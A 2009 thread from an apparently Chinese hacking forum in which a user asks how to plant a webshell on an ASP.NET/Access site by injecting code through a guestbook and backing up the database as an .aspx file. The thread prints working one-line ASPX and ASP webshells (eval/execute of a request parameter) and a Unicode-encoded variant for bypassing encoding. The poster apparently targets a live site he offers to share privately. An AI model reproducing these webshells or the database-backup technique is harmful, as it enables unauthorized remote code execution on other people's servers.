【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 大牛们看看这个如何拿webshell [打印本页]

作者: 394931603 时间: 2009-9-6 16:41 标题: 大牛们看看这个如何拿webshell

access 数据库+asp.net组合
数据库可备份为aspx，
留言功能可以写数据库
直接插入一句话
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["x"],"unsafe"));%>
备份数据库为1.aspx无法连接

asp的插入一句话需要转换编码
aspx插入如何插入？？
这是asp插入的语句
┼攠數畣整爠煥敵瑳∨≡┩>
上面那串乱码，是<% execute request("a")%>的unicode编码。

现在想知道aspx的如何插入一句话。。。
或者有别的方法拿shell
可上传图片。。。抓包上传还不熟，所以。。。想知道还有别的方法吗？

作者: 394931603 时间: 2009-9-6 16:42

直接把一句话写入数据库，备份后访问时乱码。。。。

作者: 柔肠寸断 时间: 2009-9-6 16:50

查找其他的薄弱点。。。

作者: 394931603 时间: 2009-9-6 17:06

3# 柔肠寸断

老大你来了啊，你真热心，刚去你qq空间留言。。提示什么列表正在维护。。去bkk空间。。看到他走了。。。

难道不能写入一句话。。。。。我把地址发给你你试试？

不允许旁注。。。只允许从我给你的站入手。。。可以吗？如何发私密消息啊。。。稍等网址发给

作者: 394931603 时间: 2009-9-6 19:12

3# 柔肠寸断
在数据库中插入一句话为什么要转换为unicode。有新进展，本机架设后插asp编码后的访问不是乱码了，但是报错…看明天给你截图。

作者: kisstoo 时间: 2009-10-16 15:52

也想知道啊

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)